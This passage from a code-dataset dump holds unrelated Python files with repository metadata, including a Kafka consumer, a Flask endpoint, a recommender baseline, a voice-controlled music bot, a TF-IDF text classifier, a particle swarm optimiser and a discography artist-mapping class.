beta*((x_i1+x_i)/2)**2\r\n S_prime += K + V\r\n \r\n return 0.5*m*h*S_prime","repo_name":"javier-rozalen/vfpg","sub_path":"MonteCarlo/modules/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2477316395","text":"import asyncio\nimport functools\nfrom typing import Any, Callable, Coroutine, Dict, List, Tuple\nfrom aiokafka import AIOKafkaConsumer, ConsumerRecord, TopicPartition\nfrom asyncpg import Pool\nfrom models.generated.call_participant import AppDbPublicCallParticipantEnvelope\n\nfrom modules.env import BOOTSTRAP_SERVERS, GROUP_ID\nfrom modules.logger import LOGGER\nfrom modules.process_call import POLL_TIMEOUT\nfrom modules.staging_db import upload_call_participant\nfrom modules.utils import get_deserialize_fn\n\n\nIN_TOPIC = \"app-db.public.call_participant\"\n\nPOLL_TIMEOUT = 2500\n\nCallParticipantRecord = ConsumerRecord[bytes, AppDbPublicCallParticipantEnvelope]\n\n\nasync def _process_call_participant(consumer: AIOKafkaConsumer, pool: Pool) -> None:\n batch_count = 0\n\n async with consumer:\n while True:\n msg_batch: Dict[TopicPartition, List[CallParticipantRecord]]\n msg_batch = await consumer.getmany(timeout_ms=POLL_TIMEOUT, max_records=20)\n\n if not msg_batch:\n 
LOGGER.info(\"No new messages on topic: %s\", IN_TOPIC)\n                continue\n\n            batch_count += 1\n\n            LOGGER.info(\"Got batch: %s\", batch_count)\n\n            commit_offsets: Dict[TopicPartition, int] = {}\n            uploading_batch: List[Tuple[int, int]] = []\n\n            for tp, msgs in msg_batch.items():\n                commit_offsets[tp] = msgs[-1].offset + 1\n\n                for msg in msgs:\n                    if msg.value == None or msg.value.after == None:\n                        continue\n\n                    call_id = msg.value.after.call_id\n                    user_id = msg.value.after.user_id\n                    leave_time = msg.value.after.leave_time\n\n                    if call_id == None or user_id == None or leave_time == None:\n                        continue\n\n                    uploading_batch.append((call_id, user_id))\n\n            await asyncio.gather(\n                *(\n                    upload_call_participant(call_id, user_id, pool)\n                    for call_id, user_id in uploading_batch\n                )\n            )\n\n            await consumer.commit(commit_offsets)\n\n\nasync def init_process_call_participant_fn() -> Callable[\n    [Pool], Coroutine[Any, Any, None]\n]:\n    LOGGER.info(\"Initializing %s topic processor\", IN_TOPIC)\n\n    consumer = AIOKafkaConsumer(\n        IN_TOPIC,\n        bootstrap_servers=BOOTSTRAP_SERVERS,\n        group_id=GROUP_ID,\n        enable_auto_commit=False,\n        auto_offset_reset=\"earliest\",\n        isolation_level=\"read_committed\",\n        value_deserializer=get_deserialize_fn(AppDbPublicCallParticipantEnvelope),\n    )\n\n    @functools.wraps(_process_call_participant)\n    async def wrapper(pool: Pool) -> None:\n        return await _process_call_participant(consumer, pool)\n\n    return wrapper\n","repo_name":"Beaglefoot/streaming-etl","sub_path":"streaming-etl/services/transformer/modules/process_call_participant.py","file_name":"process_call_participant.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"31919288306","text":"import json\nimport time\nfrom flask import Flask\n\napp = Flask(__name__)\n\n@app.route('/')\ndef interview():\n    output = {}\n    output[\"message\"] = \"Automate all the things!\"\n    output[\"timestamp\"] = round(time.time())\n\n\n    return json.dumps(output)\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0')","repo_name":"DoriftoShoes/pwh-project","sub_path":"app/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"41053643372","text":"import numpy as np\n\n\nclass BaselineModel:\n    \"\"\"\n    Baseline recommendation model\n\n    It doesn't use any collaborative information. It predicts a missing rating as the mean rating of the whole training set,\n    the row mean, the column mean, or a row/column deviation-adjusted mean, depending on the prediction mode\n    \"\"\"\n\n    def __init__(self, row_count, col_count, prediction_mode='row_col_mean'):\n        \"\"\"\n        :param row_count: Row count\n        :param col_count: Column count\n        :param prediction_mode: str -> Method of prediction. 
Possible values:\n - 'mean' : A missing rating is predicted as global mean\n - 'row_mean' : A missing rating is predicted as row mean\n - 'col_mean' : A missing rating is predicted as col mean\n - 'row_col_mean' : A missing rating is predicted by using global mean, row deviation from mean and column\n deviation from mean\n \"\"\"\n self.row_count = row_count\n self.col_count = col_count\n self.prediction_mode = prediction_mode\n self.mean = None\n self.row2deviation = None\n self.col2deviation = None\n\n def fit(self, X, y):\n \"\"\"\n X is Nx2,\n :param X: two dimensional np array where each line is [row_index, column_index]\n :param y: one dimensional np array\n \"\"\"\n mean = y.mean()\n self.mean = mean\n\n row2mean = np.zeros(self.row_count)\n row2count = np.zeros(self.row_count)\n\n col2mean = np.zeros(self.col_count)\n col2count = np.zeros(self.col_count)\n\n for (row, col), rating in zip(X, y):\n row2count[row] += 1\n row2mean[row] += rating\n\n col2count[col] += 1\n col2mean[col] += rating\n\n row2mean[row2count == 0] = mean\n col2mean[col2count == 0] = mean\n row2count[row2count == 0] = 1\n col2count[col2count == 0] = 1\n\n row2mean /= row2count\n col2mean /= col2count\n\n self.row2deviation = row2mean - mean\n self.col2deviation = col2mean - mean\n\n def predict(self, X):\n \"\"\"\n :param X: Nx2\n :return: y_predict\n \"\"\"\n y_predict = np.ones(X.shape[0]) * self.mean\n\n if self.prediction_mode == 'mean':\n return y_predict\n elif self.prediction_mode == 'row_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.row2deviation[row]\n elif self.prediction_mode == 'col_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.col2deviation[col]\n elif self.prediction_mode == 'row_col_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.row2deviation[row] + self.col2deviation[col]\n else:\n raise ValueError('Unexpected prediction mode: {}'.format(self.prediction_mode))\n\n return y_predict\n","repo_name":"seljukgulcan/eee-585-project","sub_path":"mr/models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12691784245","text":"import pyttsx3 as p\r\nimport pywhatkit\r\nimport speech_recognition as sr\r\n\r\n\r\nlistener = sr.Recognizer()\r\nengine = p.init()\r\nvoices = engine.getProperty(\"voices\")\r\nengine.setProperty(\"voice\", voices[0].id)\r\n\r\n\r\ndef talk(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source:\r\n print(\"listening...\")\r\n voice = listener.listen(source)\r\n command = listener.recognize_google(voice)\r\n command = command.lower()\r\n if \"bot\" in command:\r\n command = command.replace(\"bot\", \"\")\r\n print(command)\r\n\r\n except:\r\n pass\r\n return command\r\n\r\n\r\ndef run_bot():\r\n command = take_command()\r\n print(command)\r\n if \"play\" in command:\r\n song = command.replace(\"play\", \"\")\r\n talk(\"playing\"+song)\r\n pywhatkit.playonyt(song)\r\n elif \"Hi\" and \"bot\" in command:\r\n talk(\"Hi sir what song do you want to listen\")\r\n else:\r\n talk(\"sorry i cant hear you\")\r\n\r\nwhile True:\r\n run_bot()\r\n\r\n","repo_name":"Phubet2547/Bot-play-music","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"6826381882","text":"import pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='Data Prep')\nparser.add_argument('file_loc', type=str, help='Path to the downloading dataset and name')\nparser.add_argument('smiles_col_name', type=str, help='Name of the Column of SMILES')\nparser.add_argument('save_path', type=str, help='Save Path of the Processed Data (CSV)')\nparser.add_argument('len',type=int,help='Number of Training Points needed in Train and Val Data')\nargs = parser.parse_args()\n\nchembl22 = pd.read_table(args.file_loc)\nprint(chembl22[args.smiles_col_name][0:10])\n\ndf = pd.DataFrame({'SMILES':chembl22[args.smiles_col_name]})\ndf.to_csv(args.save_path+'.csv')\n\ndf = pd.DataFrame({'SMILES':chembl22[args.smiles_col_name]})\ndf.to_csv(args.save_path+'.csv')\n\n#Shuffling the Data to remove any sampling bias\ndf.sample(frac=1)\n\ntrain_data = df.head(args.len)\nval_data = df.tail(args.len)\n\ntrain_data.to_csv(args.save_path+'_train.csv')\nval_data.to_csv(args.save_path+'_val.csv')\n","repo_name":"Ishan-Kumar2/Molecular_VAE_Pytorch","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"22799459396","text":"#导包\nimport csv\n\nimport os\n\n\nclass CsvFileManager4:\n def read(self, filename):\n list =[] #声明一个空列表\n #指定csv文件的路径\n #path =\"C:\\Users\\51Testing\\PycharmProjects\\selenium7th\\data\\test_data.csv\"\n #这样生产的path路径有个缺点?可移值性比较差\n #更好的方法是:\n #os.path.dirname(__file__)这是一个固定的写法,用来获取当前文件的目录\n #os:操作系统 path:路径 driname :目录名 __file__是python内置的变量,表示当前文件路径:C:\\Users\\51Testing\\PycharmProjects\\selenium7th\\day5\n base_path = os.path.dirname(__file__)\n print(base_path)\n#用bast_path的好处:不管项目放到任何路径下面,都可以找到文件的绝对路径\n#我们真正想要的是csv文件路径,不是代码文件路径\n#所以我们可以通过basepath 计算出csv文件路径\n path = base_path.replace('day5','data/'+ filename)\n print(path)\n #打开指定文件\n #file = open(path,'r')\n #每次打开文件,用完之后都要关闭,释放系统资源\n #上机课用的是try ... 
finally 的方法\n #更常用的方法:是 with ...as 的语法结构\n with open(path,'r') as file:\n data_table = csv.reader(file)\n #循环遍历数据表中的每一行\n for row in data_table:\n print(row)\n\n\n #5/声明一个二维列表,保存data\n list.append(row)\n #在read 方法末尾.返回这个列表\n return list\n\n#一个CSV文件只适合保存一组测试用例\n#所以不同的测试用例,应该对应不同的csv 文件\n#filname 一个变量,可找到该路径下的所有csv 文件, 入需输入 在写入指定的csv文件\nif __name__ == '__main__':\n list = CsvFileManager4().read(\"test_data.csv\")\n print(list[0][0])\n\n\n","repo_name":"ddtest333/selenium7th","sub_path":"day5/csvFileManager4.py","file_name":"csvFileManager4.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41683326565","text":"#######################################################################\n# Python Tkinter Color Changing Number Guessing Game\n# Python Tkinter Juego de adivinanzas de números que cambian de color\n########################################################################\n\nfrom tkinter import *\nfrom random import randint\n\nroot = Tk()\nroot.title('Python Tkinter Color Changing Number Guessing Game')\nroot.iconbitmap('Python Tkinter Color Changing Number Guessing Game/icons/color.ico')\nroot.geometry(\"500x500\")\n\nnum_label = Label(root, text=\"Pick A Number\\nBetwen 1 and 10!\", font=(\"Brush Script MT\", 32))\nnum_label.pack(pady=20)\n\ndef guesser():\n if guess_box.get().isdigit():\n # Reset our label\n num_label.config(text=\"Pick A Number\\nBetwen 1 and 10!\")\n # find\n #ABS devuelve el valor apsoluto\n dif = abs(num - int(guess_box.get()))\n\n # check to see if correct\n\n if int (guess_box.get()) == num:\n bc = \"SystemButtonFace\"\n num_label.config(text=\"Correct\")\n elif dif == 5:\n # set background color to white\n bc = \"white\"\n elif dif < 5:\n bc = f'#ff{dif}{dif}{dif}{dif}'\n else:\n bc = f'#{dif}{dif}{dif}{dif}ff'\n\n # Change the cackground\n root.config(bg=bc)\n\n #change bg label\n num_label.config(bg=bc)\n\n else:\n # Delete entry and throw wror message\n guess_box.delete(0, END)\n num_label.config(text=\"Hey! 
That's Not A Number\")\n\ndef rando():\n    global num\n    num = randint(1, 10)\n    #clear the guess box\n    guess_box.delete(0, END)\n    # Change the colors back to normal\n    num_label.config(bg=\"SystemButtonFace\")\n    root.config(bg=\"SystemButtonFace\")\n\n\n\n\nguess_box = Entry(root, font=(\"Helvetica\", 100), width=2)\nguess_box.pack(pady=20)\n\nguess_button = Button(root, text=\"Submit\", command=guesser)\nguess_button.pack(pady=20)\n\nrand_button = Button(root, text=\"New Number\", command=rando)\nrand_button.pack(pady=20)\n\n# Generate a random number on start\nrando()\nroot.mainloop()","repo_name":"BrianMarquez3/Python-Course","sub_path":"Python Tkinter Color Changing Number Guessing Game/ColorChangingNumberGuessingGame.py","file_name":"ColorChangingNumberGuessingGame.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"}
+{"seq_id":"32642266092","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('bagofwords.csv',low_memory = False)\n\nds = ['DATA/LOCATION/1', 'DATA/LOCATION/2',\n     'DATA/LOCATION/3','DATA/LOCATION/4',\n     'DATA/LOCATION/5']\n\n\n\nfdf = pd.DataFrame() \na = []\nb = []\nc = []\nfor direct in ds:\n    os.chdir(direct)\n    for file in os.listdir():\n        f = pd.read_csv(file,low_memory = False)\n        fdf = pd.concat([fdf,f])\n        # COMBINES ALL FILES LISTED IN THE ds DIRECTORY INTO ONE LARGE FILE\n        #GOOD TRICK FOR CLEANING MULTIPLE LANDINGS\n        \nfdf['HIT'] = np.where((fdf['features'].isna() == False) | (fdf['ADAS'] > 0), 1, 0) #CREATE A HIT FLAG FOR ADAS IDENTIFIED TOKENS\n\npositive = fdf[fdf['HIT'] > 0]['Value']\npositive = positive.append(df.token) \nnegative = fdf[fdf['HIT'] == 0]['Value']\nfull = fdf[['Value','HIT']]\n\n\nmore = pd.DataFrame()\nmore ['Value'] = df['token']\nmore['HIT'] = 1\n\nfull = full.append(more)\n\n#######################\n#######################\n# MODEL\n#######################\n#######################\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ndef cv(data):\n    count_vectorizer = CountVectorizer()\n\n    emb = count_vectorizer.fit_transform(data)\n\n    return emb, count_vectorizer\n\nlist_corpus = full[\"Value\"].tolist()\nlist_labels = full[\"HIT\"].tolist()\n\nX_train, X_test, y_train, y_test = train_test_split(list_corpus, list_labels, test_size=0.2, \n                                                        random_state=40)\n\nX_train_counts, count_vectorizer = cv(X_train)\nX_test_counts = count_vectorizer.transform(X_test)\n\n#######################\n#######################\n\nfrom sklearn.linear_model import LogisticRegression\n\nclf = LogisticRegression(C=30.0, class_weight='balanced', solver='newton-cg', \n                         multi_class='multinomial', n_jobs=-1, random_state=40)\nclf.fit(X_train_counts, y_train)\n\ny_predicted_counts = clf.predict(X_test_counts)\n\n\n#######################\n#######################\n\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report\n\ndef get_metrics(y_test, y_predicted):  \n    # true positives / (true positives+false positives)\n    precision = precision_score(y_test, y_predicted, pos_label=None,\n                                    average='weighted')             \n    # true positives / (true positives + false negatives)\n    recall = recall_score(y_test, y_predicted, pos_label=None,\n                              average='weighted')\n    \n    # harmonic mean of precision and recall\n    f1 = f1_score(y_test, y_predicted, pos_label=None, average='weighted')\n    \n    # true positives + true negatives/ total\n    accuracy = accuracy_score(y_test, 
y_predicted)\n return accuracy, precision, recall, f1\n\naccuracy, precision, recall, f1 = get_metrics(y_test, y_predicted_counts)\nprint(\"accuracy = %.3f, precision = %.3f, recall = %.3f, f1 = %.3f\" % (accuracy, precision, recall, f1))\n\n#######################\n####################### TAILORED FROM STACK:\n\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.winter):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title, fontsize=30)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, fontsize=20)\n plt.yticks(tick_marks, classes, fontsize=20)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", \n color=\"white\" if cm[i, j] < thresh else \"black\", fontsize=40)\n \n plt.tight_layout()\n plt.ylabel('True label', fontsize=30)\n plt.xlabel('Predicted label', fontsize=30)\n\n return plt\n\n\ncm = confusion_matrix(y_test, y_predicted_counts)\nfig = plt.figure(figsize=(10, 10))\nplot = plot_confusion_matrix(cm, classes=['NOT ADAS','ADAS','Unsure'], normalize=False, title='Confusion matrix')\nplt.show()\nprint(cm)\n\ndef get_most_important_features(vectorizer, model, n=100):\n index_to_word = {v:k for k,v in vectorizer.vocabulary_.items()}\n \n # loop for each class\n classes ={}\n for class_index in range(model.coef_.shape[0]):\n word_importances = [(el, index_to_word[i]) for i,el in enumerate(model.coef_[class_index])]\n sorted_coeff = sorted(word_importances, key = lambda x : x[0], reverse=True)\n tops = sorted(sorted_coeff[:n], key = lambda x : x[0])\n bottom = sorted_coeff[-n:]\n classes[class_index] = {\n 'tops':tops,\n 'bottom':bottom\n }\n return classes\n\nimportance = get_most_important_features(count_vectorizer, clf, 100)\n\n\ndef plot_important_words(top_scores, top_words, bottom_scores, bottom_words, name):\n y_pos = np.arange(len(top_words))\n top_pairs = [(a,b) for a,b in zip(top_words, top_scores)]\n top_pairs = sorted(top_pairs, key=lambda x: x[1])\n \n bottom_pairs = [(a,b) for a,b in zip(bottom_words, bottom_scores)]\n bottom_pairs = sorted(bottom_pairs, key=lambda x: x[1], reverse=True)\n \n top_words = [a[0] for a in top_pairs]\n top_scores = [a[1] for a in top_pairs]\n \n bottom_words = [a[0] for a in bottom_pairs]\n bottom_scores = [a[1] for a in bottom_pairs]\n \n fig = plt.figure(figsize=(20, 30)) \n\n plt.subplot(121)\n plt.barh(y_pos,bottom_scores, align='center', alpha=0.5)\n plt.title('Not ADAS', fontsize=20)\n plt.yticks(y_pos, bottom_words, fontsize=14)\n plt.suptitle('Key words', fontsize=16)\n plt.xlabel('Importance', fontsize=20)\n \n plt.subplot(122)\n plt.barh(y_pos,top_scores, align='center', alpha=0.5)\n plt.title('ADAS', fontsize=20)\n plt.yticks(y_pos, top_words, fontsize=14)\n plt.suptitle(name, fontsize=16)\n plt.xlabel('Importance', fontsize=20)\n \n plt.subplots_adjust(wspace=0.8)\n plt.show()\n\ntop_scores = [a[0] for a in importance[0]['tops']]\ntop_words = [a[1] for a in importance[0]['tops']]\nbottom_scores = [a[0] for a in importance[0]['bottom']]\nbottom_words = [a[1] for a in importance[0]['bottom']]\n\nplot_important_words(top_scores, top_words, bottom_scores, bottom_words, \"Most important words for 
relevance\")\n\n\n#######################\n#######################\n\ndef tfidf(data):\n tfidf_vectorizer = TfidfVectorizer()\n\n train = tfidf_vectorizer.fit_transform(data)\n\n return train, tfidf_vectorizer\n\nX_train_tfidf, tfidf_vectorizer = tfidf(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n\nclf_tfidf = LogisticRegression(C=30.0, class_weight='balanced', solver='newton-cg', \n multi_class='multinomial', n_jobs=-1, random_state=40)\nclf_tfidf.fit(X_train_tfidf, y_train)\n\ny_predicted_tfidf = clf_tfidf.predict(X_test_tfidf)\n\naccuracy_tfidf, precision_tfidf, recall_tfidf, f1_tfidf = get_metrics(y_test, y_predicted_tfidf)\nprint(\"accuracy = %.3f, precision = %.3f, recall = %.3f, f1 = %.3f\" % (accuracy_tfidf, precision_tfidf, \n recall_tfidf, f1_tfidf))\n\ncm2 = confusion_matrix(y_test, y_predicted_tfidf)\nfig = plt.figure(figsize=(10, 10))\nplot = plot_confusion_matrix(cm2, classes=['NOT ADAS','ADAS','Unsure'], normalize=False, title='Confusion matrix')\nplt.show()\nprint(\"TFIDF confusion matrix\")\nprint(cm2)\nprint(\"BoW confusion matrix\")\nprint(cm) \n\nimportance_tfidf = get_most_important_features(tfidf_vectorizer, clf_tfidf, 100)\n\n#######################\n####################### TAILORED FROM STACK:\n\ntop_scores = [a[0] for a in importance_tfidf[0]['tops']]\ntop_words = [a[1] for a in importance_tfidf[0]['tops']]\nbottom_scores = [a[0] for a in importance_tfidf[0]['bottom']]\nbottom_words = [a[1] for a in importance_tfidf[0]['bottom']]\n\nplot_important_words(top_scores, top_words, bottom_scores, bottom_words, \"Most important words for relevance\")\n\n#######################\n####################### \n\nimport pickle\nfilename = 'finalized_model.sav'\npickle.dump(clf_tfidf, open(filename, 'wb'))\n\ntrial = pd.read_csv('TEST_FILE.csv', low_memory = False)\n\nXtrial = trial['Value'].tolist()\nXtrial2 = tfidf_vectorizer.transform(Xtrial)\nYtrial = clf_tfidf.predict_proba(Xtrial2)[:,1]\n\ntrial['preds'] = Ytrial\n\n########### TO CALL ####################\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n\nfilename = 'HOME/NLP/finalized_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\ntfidf_vectorizer = pickle.load(open(\"/HOME/NLP/tfidf_vectorizer.pickle\", 'rb'))\n\ndef ADASprob(tgt_file):\n# tfidf_vectorizer = TfidfVectorizer()\n df = pd.read_csv(tgt_file, low_memory = False)\n Xtrial = df['Value'].fillna('BLANK').tolist()\n Xtrial2 = tfidf_vectorizer.transform(Xtrial) # tfidf_vectorizer scikit package\n Ytrial = loaded_model.predict_proba(Xtrial2)[:,1] # Return P(X == 1)\n df['ADAS PROB'] = Ytrial\n df['_merge'] = pd.Categorical(df['_merge'], [\"both\",\"right_only\", \"left_only\"])\n df = df.sort_values(by = ['_merge', 'ADAS PROB'], ascending = False)\n# df.to_csv(tgt_file)\n return df\n \n#Call\nADASprob('/HOME/audi_mapped_melt_flagged.csv')\n","repo_name":"The-Doc-P/Code","sub_path":"TfidfVectorizer_LogitReg.py","file_name":"TfidfVectorizer_LogitReg.py","file_ext":"py","file_size_in_byte":9565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2785184127","text":"def extravalcalc(row,col,maxmat):\n val = 0\n modval = (maxmat) % 2\n if row == col:\n return row\n elif row > col and modval == 1:\n return col\n elif row > col and modval == 0:\n return row+(row-col)\n elif row < col and modval == 0:\n return row\n else:\n 
return col+(col-row)\n \n \n pass\nres = []\nt = int(input())\nfor i in range(t):\n row,col = list(map(int,input().split()))\n maxmat = max(row,col)\n val = (maxmat-1)**2 + extravalcalc(row,col,maxmat)\n res.append(val)\n\nfor i in range(t):\n print(res[i])\n\n \n \n ","repo_name":"pradyutnathradhae/interview_Program","sub_path":"mixed_problems/number_spiral.py","file_name":"number_spiral.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73656684306","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 7 03:37:05 2023\r\n\r\n@author: msi-1\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n# PSO Parameters\r\nnumParticles = 50 # Number of particles in the swarm\r\nmaxIterations = 100 # Maximum number of iterations\r\nc1 = 2 # Cognitive coefficient\r\nc2 = 2 # Social coefficient\r\nw = 0.7 # Inertia weight\r\n\r\n# Problem-specific parameters\r\nDim = 2 # Dimensionality of the problem\r\n# Define your problem here, including the objective function and any constraints\r\n\r\n\r\n# Define the PSO function\r\ndef pso():\r\n # Initialize the swarm\r\n position = np.random.rand(numParticles, Dim) # Particle positions\r\n velocity = np.zeros((numParticles, Dim)) # Particle velocities\r\n personalBest = position.copy() # Personal best positions\r\n personalBestFitness = np.zeros(numParticles) + np.inf # Personal best fitness values\r\n globalBest = np.zeros(Dim) # Global best position\r\n globalBestFitness = np.inf # Global best fitness value\r\n\r\n # Main loop\r\n for iteration in range(maxIterations):\r\n # Evaluate fitness for each particle\r\n for i in range(numParticles):\r\n fitness = objective_function(position[i])\r\n\r\n # Update personal best if better fitness is found\r\n if fitness < personalBestFitness[i]:\r\n personalBest[i] = position[i]\r\n personalBestFitness[i] = fitness\r\n\r\n # Update global best if better fitness is found\r\n if fitness < globalBestFitness:\r\n globalBest = position[i]\r\n globalBestFitness = fitness\r\n\r\n # Update particle velocities and positions\r\n for i in range(numParticles):\r\n r1 = np.random.rand(Dim)\r\n r2 = np.random.rand(Dim)\r\n velocity[i] = w * velocity[i] \\\r\n + c1 * r1 * (personalBest[i] - position[i]) \\\r\n + c2 * r2 * (globalBest - position[i])\r\n position[i] = position[i] + velocity[i]\r\n\r\n # Apply any necessary constraints to the particle positions\r\n\r\n # Update fitness if necessary\r\n\r\n # Display current best fitness\r\n print(f'Iteration {iteration + 1}: Best Fitness = {globalBestFitness}')\r\n\r\n # Display final result\r\n print('Optimization Complete!')\r\n print(f'Best Fitness = {globalBestFitness}')\r\n print(f'Best Position = {globalBest}')\r\n\r\n\r\n# Define your objective function\r\ndef objective_function(x):\r\n # Define your objective function here\r\n return np.sum(x**2)\r\n \r\n\r\n\r\n# Run the PSO algorithm\r\npso()\r\n","repo_name":"prathu1812/Evolutionary_Algorithms","sub_path":"Evolutionary Algorithms/Python Codes/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11002251882","text":"from dbBase import dbBase\nfrom searchUtils import findNearest\nfrom pandas import DataFrame, Series\n\n\n########################################################################################################\n#\n# Set Artist 
Database\n#\n########################################################################################################\nclass dbArtistMap():\n def __init__(self, db, known=False, debug=False):\n self.db = db\n self.debug = debug\n if debug:\n print(\"Getting DB Data For {0}\".format(db))\n \n try:\n self.disc = dbBase(db.lower())\n except:\n raise ValueError(\"Cannot create a dbBase() object with [{0}]\".format(db.lower()))\n \n self.discdf = None\n self.artists = None\n self.albumsDB = None\n self.artistIDToName = None\n self.artistNameToID = None\n self.artistAlbumsDB = None\n self.Nalbums = None\n self.known = known\n if debug:\n if self.known is True:\n print(\"Only Getting Known Artist DB Data\")\n else:\n print(\"Getting All Artist DB Data\")\n \n self.artistIDToName = None\n self.artistNameToID = None\n \n self.finalArtistName = \"CleanDiscArtist\"\n \n self.setArtistIDMap()\n self.setAlbumIDMap()\n self.summary()\n \n \n ########################################################################################################\n #\n # Get Artist ID Mapping\n #\n ########################################################################################################\n def getArtistIDFromName(self, artistName):\n if self.artistNameToID is None:\n self.setArtistIDMap()\n if self.artistNameToID.get(artistName) is None:\n print(\"Artist [{0}] is not a member of artistNameToID.\".format(artistName))\n return None\n artistID = self.artistNameToID[artistName]\n return artistID\n\n def getArtistNameFromID(self, artistID):\n if self.artistIDToName is None:\n self.setArtistIDMap()\n if self.artistIDToName.get(artistID) is None:\n print(\"Artist ID [{0}] is not a member of artistIDToName.\".format(artistID))\n return None\n artistName = self.artistIDToName[artistID]\n return artistName\n \n \n \n ########################################################################################################\n #\n # Set Artist ID Mapping\n #\n ########################################################################################################\n def setArtistIDMap(self):\n if self.debug:\n print(\" Getting Master Artist DB File ({0})\".format(self.db))\n\n if self.known is True:\n self.discdf = self.disc.getMasterKnownSlimArtistDiscogsDB()\n else:\n self.discdf = self.disc.getMasterSlimArtistDiscogsDB()\n \n self.artists = [x for x in list(self.discdf[self.finalArtistName]) if x is not None]\n if self.debug:\n print(\" Found {0} Artists in DB\".format(len(self.artists)))\n\n self.artistIDToName = self.discdf[self.finalArtistName].to_dict()\n self.artistNameToID = {}\n if self.debug:\n print(\" Found {0} ID -> Name entries\".format(len(self.artistIDToName)))\n\n if self.known is True:\n if self.debug is True:\n print(\" Only loading a subset of known artists into memory.\")\n for artistID,artistName in self.artistIDToName.items():\n if artistName is None:\n continue\n if self.artistNameToID.get(artistName) is None:\n self.artistNameToID[artistName] = []\n self.artistNameToID[artistName].append(artistID)\n if self.debug:\n print(\" Found {0} Name -> ID entries\".format(len(self.artistNameToID)))\n \n \n ########################################################################################################\n #\n # Set Artist Album ID Mapping\n #\n ########################################################################################################\n def setAlbumIDMap(self): \n if self.debug:\n print(\" Getting Master Artist Album DB File ({0})\".format(self.db))\n \n if self.known is True:\n 
self.albumsDB = self.disc.getMasterKnownArtistAlbumsDiscogsDB()\n        else:\n            self.albumsDB = self.disc.getMasterSlimArtistAlbumsDiscogsDB()\n        \n        if self.debug:\n            if self.known is True:\n                print(\"  Only loading a subset of known artists into memory.\")\n            print(\"  Found {0} Artist Albums\".format(len(self.albumsDB)))\n        \n        if isinstance(self.albumsDB, DataFrame):\n            if self.albumsDB.shape[0] == 0:\n                self.albumsDB = Series()\n                self.albumsDB.name = \"Albums\"\n                return\n        \n        try:\n            self.albumsDB = self.albumsDB[\"Albums\"]\n        except:\n            raise ValueError(\"Error getting Albums from Artist Albums Database\")\n        \n        \n    \n    ########################################################################################################\n    #\n    # Get Artist Data\n    #\n    ########################################################################################################\n    def getNearestArtist(self, artistName, num=1, cutoff=0.9, debug=False):\n        nearArtists = findNearest(artistName, self.getArtists(), num=num, cutoff=cutoff)\n        if len(nearArtists) > 0:\n            return nearArtists[0]\n        return None\n\n    \n    def getArtistIDs(self, artistName, num=10, cutoff=0.7, debug=False):\n        artistIDs = {}\n        if self.artistNameToID.get(artistName) is not None:\n            if debug is True:\n                print(\"\\tReturning ArtistIDs for Found ArtistName: {0}\".format(artistName))\n            artistIDs[artistName] = self.artistNameToID[artistName]\n            return artistIDs\n        elif num is None or cutoff is None:\n            if debug is True:\n                print(\"\\tReturning Nothing Because Artist: {0} Was Not Found\".format(artistName))\n            return {}\n        